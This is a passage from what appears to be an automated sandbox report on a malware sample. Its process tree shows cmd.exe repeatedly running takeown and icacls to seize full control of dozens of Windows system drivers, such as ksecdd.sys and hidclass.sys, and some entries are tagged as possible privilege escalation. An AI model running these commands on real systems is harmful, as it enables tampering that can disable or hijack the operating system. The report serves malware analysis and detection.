C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\HdAudio.sys /grant "Admin:F"3⤵PID:6964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbatt.sys && icacls C:\Windows\System32\drivers\hidbatt.sys /grant "%username%:F" && exit2⤵PID:7092
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidbatt.sys3⤵PID:5212
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidbatt.sys /grant "Admin:F"3⤵PID:6244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbth.sys && icacls C:\Windows\System32\drivers\hidbth.sys /grant "%username%:F" && exit2⤵PID:1984
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidbth.sys3⤵PID:6040
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidbth.sys /grant "Admin:F"3⤵PID:5796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidclass.sys && icacls C:\Windows\System32\drivers\hidclass.sys /grant "%username%:F" && exit2⤵PID:5728
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidclass.sys3⤵
- Modifies file permissions
PID:6872
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidclass.sys /grant "Admin:F"3⤵PID:5636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidi2c.sys && icacls C:\Windows\System32\drivers\hidi2c.sys /grant "%username%:F" && exit2⤵PID:6108
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidi2c.sys3⤵PID:6836
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidi2c.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:5616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidinterrupt.sys && icacls C:\Windows\System32\drivers\hidinterrupt.sys /grant "%username%:F" && exit2⤵PID:6196
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidinterrupt.sys3⤵PID:5716
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidinterrupt.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:6636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidir.sys && icacls C:\Windows\System32\drivers\hidir.sys /grant "%username%:F" && exit2⤵PID:6296
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidir.sys3⤵PID:7004
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidir.sys /grant "Admin:F"3⤵PID:5396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidparse.sys && icacls C:\Windows\System32\drivers\hidparse.sys /grant "%username%:F" && exit2⤵PID:6500
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidparse.sys3⤵PID:6408
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidparse.sys /grant "Admin:F"3⤵PID:6368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidspi.sys && icacls C:\Windows\System32\drivers\hidspi.sys /grant "%username%:F" && exit2⤵PID:5884
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidspi.sys3⤵PID:5824
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidspi.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:6644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HidSpiCx.sys && icacls C:\Windows\System32\drivers\HidSpiCx.sys /grant "%username%:F" && exit2⤵PID:2936
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\HidSpiCx.sys3⤵
- Possible privilege escalation attempt
PID:6676
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\HidSpiCx.sys /grant "Admin:F"3⤵PID:6292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidusb.sys && icacls C:\Windows\System32\drivers\hidusb.sys /grant "%username%:F" && exit2⤵PID:5996
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidusb.sys3⤵
- Possible privilege escalation attempt
PID:6308
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidusb.sys /grant "Admin:F"3⤵PID:7148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HpSAMD.sys && icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "%username%:F" && exit2⤵PID:6116
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\HpSAMD.sys3⤵PID:6336
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\HpSAMD.sys /grant "Admin:F"3⤵PID:6872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Hsp.sys && icacls C:\Windows\System32\drivers\Hsp.sys /grant "%username%:F" && exit2⤵PID:6984
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Hsp.sys3⤵PID:6688
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Hsp.sys /grant "Admin:F"3⤵PID:5636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\http.sys && icacls C:\Windows\System32\drivers\http.sys /grant "%username%:F" && exit2⤵PID:7052
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\http.sys3⤵PID:6552
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\http.sys /grant "Admin:F"3⤵PID:6844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hvcrash.sys && icacls C:\Windows\System32\drivers\hvcrash.sys /grant "%username%:F" && exit2⤵PID:2728
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hvcrash.sys3⤵PID:6732
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hvcrash.sys /grant "Admin:F"3⤵PID:3552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hvservice.sys && icacls C:\Windows\System32\drivers\hvservice.sys /grant "%username%:F" && exit2⤵PID:2864
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hvservice.sys3⤵PID:6328
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hvservice.sys /grant "Admin:F"3⤵PID:6408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hvsocket.sys && icacls C:\Windows\System32\drivers\hvsocket.sys /grant "%username%:F" && exit2⤵PID:6180
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hvsocket.sys3⤵PID:6092
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hvsocket.sys /grant "Admin:F"3⤵PID:7000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hwpolicy.sys && icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "%username%:F" && exit2⤵PID:6052
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hwpolicy.sys3⤵PID:6820
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hwpolicy.sys /grant "Admin:F"3⤵PID:6276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hyperkbd.sys && icacls C:\Windows\System32\drivers\hyperkbd.sys /grant "%username%:F" && exit2⤵PID:6036
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hyperkbd.sys3⤵PID:6408
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hyperkbd.sys /grant "Admin:F"3⤵PID:884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HyperVideo.sys && icacls C:\Windows\System32\drivers\HyperVideo.sys /grant "%username%:F" && exit2⤵PID:5624
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\HyperVideo.sys3⤵PID:6900
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\HyperVideo.sys /grant "Admin:F"3⤵PID:6824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\i8042prt.sys && icacls C:\Windows\System32\drivers\i8042prt.sys /grant "%username%:F" && exit2⤵PID:5376
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\i8042prt.sys3⤵PID:896
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\i8042prt.sys /grant "Admin:F"3⤵PID:6380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iagpio.sys && icacls C:\Windows\System32\drivers\iagpio.sys /grant "%username%:F" && exit2⤵PID:6476
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iagpio.sys3⤵PID:4508
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iagpio.sys /grant "Admin:F"3⤵PID:6980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iai2c.sys && icacls C:\Windows\System32\drivers\iai2c.sys /grant "%username%:F" && exit2⤵PID:4228
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iai2c.sys3⤵PID:6928
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iai2c.sys /grant "Admin:F"3⤵PID:6140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys /grant "%username%:F" && exit2⤵PID:6912
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys3⤵PID:6932
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys /grant "Admin:F"3⤵PID:6852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys /grant "%username%:F" && exit2⤵PID:7104
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys3⤵PID:6268
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys /grant "Admin:F"3⤵PID:5848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_CNL.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_CNL.sys /grant "%username%:F" && exit2⤵PID:6740
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_CNL.sys3⤵PID:6772
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_CNL.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:6028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_GLK.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_GLK.sys /grant "%username%:F" && exit2⤵PID:5188
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_GLK.sys3⤵PID:2840
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_GLK.sys /grant "Admin:F"3⤵PID:6488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_I2C.sys /grant "%username%:F" && exit2⤵PID:5528
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C.sys3⤵PID:7148
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iaLPSS2i_I2C.sys /grant "Admin:F"3⤵PID:6104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_BXT_P.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_I2C_BXT_P.sys /grant "%username%:F" && exit2⤵PID:6264
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_BXT_P.sys3⤵PID:6168
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iaLPSS2i_I2C_BXT_P.sys /grant "Admin:F"3⤵PID:5684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_CNL.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_I2C_CNL.sys /grant "%username%:F" && exit2⤵PID:6580
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_CNL.sys3⤵PID:6140
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iaLPSS2i_I2C_CNL.sys /grant "Admin:F"3⤵PID:6008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_GLK.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_I2C_GLK.sys /grant "%username%:F" && exit2⤵PID:6688
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_GLK.sys3⤵PID:6692
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iaLPSS2i_I2C_GLK.sys /grant "Admin:F"3⤵PID:6228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSSi_GPIO.sys && icacls C:\Windows\System32\drivers\iaLPSSi_GPIO.sys /grant "%username%:F" && exit2⤵PID:5124
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaLPSSi_GPIO.sys3⤵
- Modifies file permissions
PID:7136
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iaLPSSi_GPIO.sys /grant "Admin:F"3⤵PID:6276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSSi_I2C.sys && icacls C:\Windows\System32\drivers\iaLPSSi_I2C.sys /grant "%username%:F" && exit2⤵PID:6872
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaLPSSi_I2C.sys3⤵PID:6952
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iaLPSSi_I2C.sys /grant "Admin:F"3⤵PID:6188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaStorAVC.sys && icacls C:\Windows\System32\drivers\iaStorAVC.sys /grant "%username%:F" && exit2⤵PID:7084
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaStorAVC.sys3⤵PID:6988
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iaStorAVC.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:5960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaStorV.sys && icacls C:\Windows\System32\drivers\iaStorV.sys /grant "%username%:F" && exit2⤵PID:6364
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaStorV.sys3⤵PID:6200
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iaStorV.sys /grant "Admin:F"3⤵PID:2928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ibbus.sys && icacls C:\Windows\System32\drivers\ibbus.sys /grant "%username%:F" && exit2⤵PID:5656
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ibbus.sys3⤵PID:6424
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ibbus.sys /grant "Admin:F"3⤵PID:6288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IndirectKmd.sys && icacls C:\Windows\System32\drivers\IndirectKmd.sys /grant "%username%:F" && exit2⤵PID:6756
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\IndirectKmd.sys3⤵PID:6248
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\IndirectKmd.sys /grant "Admin:F"3⤵PID:6232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelide.sys && icacls C:\Windows\System32\drivers\intelide.sys /grant "%username%:F" && exit2⤵PID:4808
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\intelide.sys3⤵PID:5216
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\intelide.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:6416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelpep.sys && icacls C:\Windows\System32\drivers\intelpep.sys /grant "%username%:F" && exit2⤵PID:5368
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6824
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\intelpep.sys3⤵PID:5704
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\intelpep.sys /grant "Admin:F"3⤵PID:6716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelpmax.sys && icacls C:\Windows\System32\drivers\intelpmax.sys /grant "%username%:F" && exit2⤵PID:5152
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\intelpmax.sys3⤵
- Possible privilege escalation attempt
PID:5380
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\intelpmax.sys /grant "Admin:F"3⤵PID:3740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IntelPMT.sys && icacls C:\Windows\System32\drivers\IntelPMT.sys /grant "%username%:F" && exit2⤵PID:6916
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\IntelPMT.sys3⤵PID:6532
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\IntelPMT.sys /grant "Admin:F"3⤵PID:6552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelppm.sys && icacls C:\Windows\System32\drivers\intelppm.sys /grant "%username%:F" && exit2⤵PID:6224
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\intelppm.sys3⤵PID:5652
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\intelppm.sys /grant "Admin:F"3⤵PID:6084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iorate.sys && icacls C:\Windows\System32\drivers\iorate.sys /grant "%username%:F" && exit2⤵PID:6320
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iorate.sys3⤵PID:5156
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iorate.sys /grant "Admin:F"3⤵PID:5912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipfltdrv.sys && icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "%username%:F" && exit2⤵PID:6808
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ipfltdrv.sys3⤵PID:6236
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "Admin:F"3⤵PID:6288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IPMIDrv.sys && icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "%username%:F" && exit2⤵PID:6640
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\IPMIDrv.sys3⤵PID:5988
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "Admin:F"3⤵PID:6152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipnat.sys && icacls C:\Windows\System32\drivers\ipnat.sys /grant "%username%:F" && exit2⤵PID:6304
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ipnat.sys3⤵PID:6524
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ipnat.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:6540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipt.sys && icacls C:\Windows\System32\drivers\ipt.sys /grant "%username%:F" && exit2⤵PID:5520
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ipt.sys3⤵PID:6700
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ipt.sys /grant "Admin:F"3⤵PID:5356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\isapnp.sys && icacls C:\Windows\System32\drivers\isapnp.sys /grant "%username%:F" && exit2⤵PID:7124
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5700
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\isapnp.sys3⤵
- Possible privilege escalation attempt
PID:7108
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\isapnp.sys /grant "Admin:F"3⤵PID:6228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ItSas35i.sys && icacls C:\Windows\System32\drivers\ItSas35i.sys /grant "%username%:F" && exit2⤵PID:6080
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ItSas35i.sys3⤵
- Possible privilege escalation attempt
PID:7116
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ItSas35i.sys /grant "Admin:F"3⤵PID:7048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdclass.sys && icacls C:\Windows\System32\drivers\kbdclass.sys /grant "%username%:F" && exit2⤵PID:5284
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbdclass.sys3⤵PID:7028
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kbdclass.sys /grant "Admin:F"3⤵PID:6340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdhid.sys && icacls C:\Windows\System32\drivers\kbdhid.sys /grant "%username%:F" && exit2⤵PID:5736
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbdhid.sys3⤵
- Possible privilege escalation attempt
PID:6448
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kbdhid.sys /grant "Admin:F"3⤵PID:6068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbldfltr.sys && icacls C:\Windows\System32\drivers\kbldfltr.sys /grant "%username%:F" && exit2⤵PID:7160
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbldfltr.sys3⤵PID:7152
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kbldfltr.sys /grant "Admin:F"3⤵PID:7072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kdnic.sys && icacls C:\Windows\System32\drivers\kdnic.sys /grant "%username%:F" && exit2⤵PID:3904
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kdnic.sys3⤵PID:6736
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kdnic.sys /grant "Admin:F"3⤵PID:6540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kmpdc.sys && icacls C:\Windows\System32\drivers\kmpdc.sys /grant "%username%:F" && exit2⤵PID:6324
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6200
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kmpdc.sys3⤵PID:5184
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kmpdc.sys /grant "Admin:F"3⤵PID:7096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\KNetPwrDepBroker.sys && icacls C:\Windows\System32\drivers\KNetPwrDepBroker.sys /grant "%username%:F" && exit2⤵PID:7056
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\KNetPwrDepBroker.sys3⤵PID:5392
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\KNetPwrDepBroker.sys /grant "Admin:F"3⤵PID:6140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ks.sys && icacls C:\Windows\System32\drivers\ks.sys /grant "%username%:F" && exit2⤵PID:6492
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ks.sys3⤵PID:6928
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ks.sys /grant "Admin:F"3⤵PID:4388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecdd.sys && icacls C:\Windows\System32\drivers\ksecdd.sys /grant "%username%:F" && exit2⤵PID:5744
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksecdd.sys3⤵PID:6804
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksecdd.sys /grant "Admin:F"3⤵PID:7076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecpkg.sys && icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "%username%:F" && exit2⤵PID:6040
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksecpkg.sys3⤵
- Modifies file permissions
PID:6664
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksecpkg.sys /grant "Admin:F"3⤵PID:5616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksthunk.sys && icacls C:\Windows\System32\drivers\ksthunk.sys /grant "%username%:F" && exit2⤵PID:5372
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksthunk.sys3⤵PID:6812
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksthunk.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:6156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lltdio.sys && icacls C:\Windows\System32\drivers\lltdio.sys /grant "%username%:F" && exit2⤵PID:6524
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lltdio.sys3⤵
- Possible privilege escalation attempt
PID:5500
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lltdio.sys /grant "Admin:F"3⤵PID:3260
-
-
-
